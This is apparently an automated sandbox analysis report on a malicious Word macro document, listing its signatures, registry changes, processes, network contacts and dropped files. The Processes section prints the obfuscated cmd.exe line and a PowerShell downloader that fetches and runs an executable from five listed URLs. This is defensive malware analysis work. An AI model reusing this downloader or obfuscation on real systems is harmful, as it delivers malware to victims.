Analysis Overview
SHA256
d57f8285ce9f2dcd946f40cd9b7d7a61e5556b54601a63cd4f3a096ccc27b508
Threat Level: Known bad
The file 7e7130a6d0947b1a621c617deab86604_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Blocklisted process makes network request
Suspicious Office macro
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 21:20
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 21:20
Reported
2024-05-28 21:22
Platform
win7-20240419-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e7130a6d0947b1a621c617deab86604_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\cmd.exe
cmd /V/C"^s^et 1^F= ^ ^ ^ ^ ^ ^ ^ ^ ^ }}{hc^tac^}^;kaerb;jc^o^$ ^m^et^I-ekovn^I^;)jco$ ,n^h^d^$(el^iF^dao^lnw^o^D.K^Pp$^{yr^t^{)PzV^$ n^i^ n^h^d$(^hc^a^erof;^'^e^xe.^'+dL^Z^$+'^\^'+ci^l^b^u^p^:vne$=jc^o$^;^'^48^7' = d^L^Z$;)'@'(^til^p^S^.^'5f/^m^oc^.ocd^dag//^:^p^tt^h^@^QJJ6^p/^m^oc.^amo^h^ab//:^p^t^t^h^@Iyt^1/moc^.^l^a^icnani^fn^ergdn^i^l//:ptt^h^@^O/m^oc.ev^i^t^a^erc^in^g^a//^:p^tt^h@o/^k^u^.^oc.rw^am^y^t//^:^pt^t^h^'^=^PzV$^;^tne^ilCbe^W.teN tce^j^bo-^w^en^=^KP^p^$ l^l^ehsr^e^w^op&&^f^or /^L %^9 in (^33^6;-1;^0)d^o s^e^t ^W^1^x^K=!^W^1^x^K!!1^F:~%^9,1!&&^i^f %^9 l^s^s ^1 c^a^l^l %^W^1^x^K:~^6%"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $pPK=new-object Net.WebClient;$VzP='http://tymawr.co.uk/o@http://agnicreative.com/O@http://lindgrenfinancial.com/1tyI@http://bahoma.com/p6JJQ@http://gaddco.com/f5'.Split('@');$ZLd = '784';$ocj=$env:public+'\'+$ZLd+'.exe';foreach($dhn in $VzP){try{$pPK.DownloadFile($dhn, $ocj);Invoke-Item $ocj;break;}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tymawr.co.uk | udp |
| DE | 142.132.181.81:80 | tymawr.co.uk | tcp |
| US | 8.8.8.8:53 | agnicreative.com | udp |
| US | 3.33.130.190:80 | agnicreative.com | tcp |
| US | 8.8.8.8:53 | lindgrenfinancial.com | udp |
| US | 104.196.150.112:80 | lindgrenfinancial.com | tcp |
Files
memory/3028-0-0x000000002F851000-0x000000002F852000-memory.dmp
memory/3028-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/3028-2-0x0000000070B7D000-0x0000000070B88000-memory.dmp
memory/3028-6-0x0000000000460000-0x0000000000560000-memory.dmp
memory/3028-10-0x0000000000460000-0x0000000000560000-memory.dmp
memory/3028-11-0x0000000000460000-0x0000000000560000-memory.dmp
memory/3028-9-0x0000000000460000-0x0000000000560000-memory.dmp
memory/3028-8-0x0000000000460000-0x0000000000560000-memory.dmp
memory/3028-7-0x0000000000460000-0x0000000000560000-memory.dmp
memory/3028-27-0x0000000070B7D000-0x0000000070B88000-memory.dmp
memory/3028-28-0x0000000000460000-0x0000000000560000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | edf06c60e64022755000de401214ac4c |
| SHA1 | 7b6746c8a0f6edf592d7a95933a2f3f57b57f997 |
| SHA256 | 78fd899e3d385cabfa54069db88f942343c43302017f4f02ef8581b847597e39 |
| SHA512 | 01229c19b34d7aa61c352e6ad8c68af8296d41f268a5102d8d7959fad7c5e38108542c1f713a82cb9b24d7c4719a79366102bd7473346ac375956cebb7c2b604 |
memory/3028-43-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/3028-44-0x0000000070B7D000-0x0000000070B88000-memory.dmp
memory/3028-45-0x0000000000460000-0x0000000000560000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 21:20
Reported
2024-05-28 21:22
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
